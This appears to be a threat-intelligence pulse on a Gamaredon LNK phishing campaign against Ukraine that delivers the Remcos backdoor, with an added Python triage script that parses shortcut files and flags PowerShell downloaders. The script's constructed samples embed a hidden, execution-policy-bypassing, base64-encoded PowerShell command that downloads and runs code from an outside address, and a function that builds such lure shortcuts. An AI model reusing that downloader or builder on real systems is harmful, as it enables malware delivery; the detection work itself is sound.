A campaign targeting users in Ukraine with malicious LNK files has been observed since November 2024. The shortcuts are disguised as Office documents and use Russian words related to troop movements as lures, continuing the actor's use of the invasion of Ukraine as a phishing theme. Opening a shortcut runs a PowerShell downloader that contacts geo-fenced servers in Russia and Germany, mostly hosted by the GTHost and HyperHosting ISPs. The second-stage payload uses DLL sideloading to execute the Remcos backdoor, which communicates with a C2 server on a specific port. The activity is attributed to the Gamaredon threat actor with medium confidence. Author: AlienVault
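The pulse describes the first stage only in outline: a shortcut that looks like an Office document but launches a PowerShell downloader. The script below is an added example for triaging such files offline; it is not AlienVault's code and not a sample from the campaign. It parses the ShellLinkHeader and StringData sections of the MS-SHLLINK format and flags shortcuts that launch PowerShell, pass an encoded command, hide the window, fetch a URL, or carry a document double extension. The lure file name, the documentation IP address and the stage-one command in make_samples() are constructed for the demonstration; the parser also assumes the target appears in the RELATIVE_PATH string, and skips the IDList and LinkInfo blocks, so a shortcut whose target lives only in the IDList would need that block walked as well.

```python
"""Added example: static triage of .lnk lures that launch a PowerShell downloader.

Parses the ShellLinkHeader and StringData of MS-SHLLINK and reports why a
shortcut looks suspicious. IDList and LinkInfo are skipped (assumption: the
target is present as RELATIVE_PATH), so production triage should also walk
the IDList. Sample files are constructed in make_samples(), not real artifacts.
"""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1) used by this parser
HAS_TARGET_IDLIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = (  # StringData entries in on-disk order with their presence bit
    ("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
    ("arguments", 0x20), ("icon_location", 0x40),
)
PS_RE = re.compile(r"powershell(?:\.exe)?|pwsh", re.I)
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOC_DOUBLE_EXT = re.compile(r"\.(?:docx?|xlsx?|pptx?|pdf|rtf)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link (IDList/LinkInfo skipped)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_TARGET_IDLIST:            # IDListSize (uint16) + ItemIDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:                                # ANSI strings use the system code page
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(filename: str, data: bytes) -> dict:
    """Score one shortcut; 'reasons' lists every indicator that fired."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    reasons, decoded = [], None
    if DOC_DOUBLE_EXT.search(filename):
        reasons.append("document double extension")
    if PS_RE.search(info.get("relative_path", "")) or PS_RE.search(args):
        reasons.append("launches PowerShell")
    if HIDDEN_RE.search(args):
        reasons.append("hidden window")
    m = ENC_RE.search(args)
    if m:
        try:   # -EncodedCommand carries base64 of a UTF-16LE script
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except ValueError:
            decoded = None
        reasons.append("encoded command")
    if re.search(r"https?://", args + (decoded or ""), re.I):
        reasons.append("downloads from URL")
    return {"file": filename, "suspicious": bool(reasons), "reasons": reasons,
            "arguments": args, "decoded_command": decoded}


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "") -> bytes:
    """Build a minimal Unicode .lnk (header + StringData only) for offline tests."""
    flags, body = IS_UNICODE, b""
    for s, bit in ((relative_path, 0x08), (arguments, 0x20), (icon_location, 0x40)):
        if s:
            flags |= bit
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(0x4C - len(header))      # timestamps, size, icon index zeroed
    return header + body


def make_samples() -> list:
    """Constructed samples (not campaign artifacts): a lure and a benign link."""
    stage1 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p')"
    enc = base64.b64encode(stage1.encode("utf-16-le")).decode()
    lure = build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        f"-w hidden -ep bypass -enc {enc}",
        r"%SystemRoot%\system32\imageres.dll",
    )
    benign = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe")
    return [("Передвижение_войск.docx.lnk", lure), ("notes.lnk", benign)]


if __name__ == "__main__":
    for fname, blob in make_samples():
        r = triage_lnk(fname, blob)
        print(fname, "SUSPICIOUS" if r["suspicious"] else "clean", r["reasons"])
```

Run against a directory of quarantined shortcuts, the reasons list gives an analyst the decoded stage-one command and the URL to pivot on before detonation; the double-extension check catches the Office-document disguise even when the arguments are obfuscated beyond what the regexes recognise.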
Related Tags:
gthost
LNK files
DLL Sideloading
T1547.001
T1059.001
Russian Federation
Germany
T1071.001
remcos
Associated Indicators: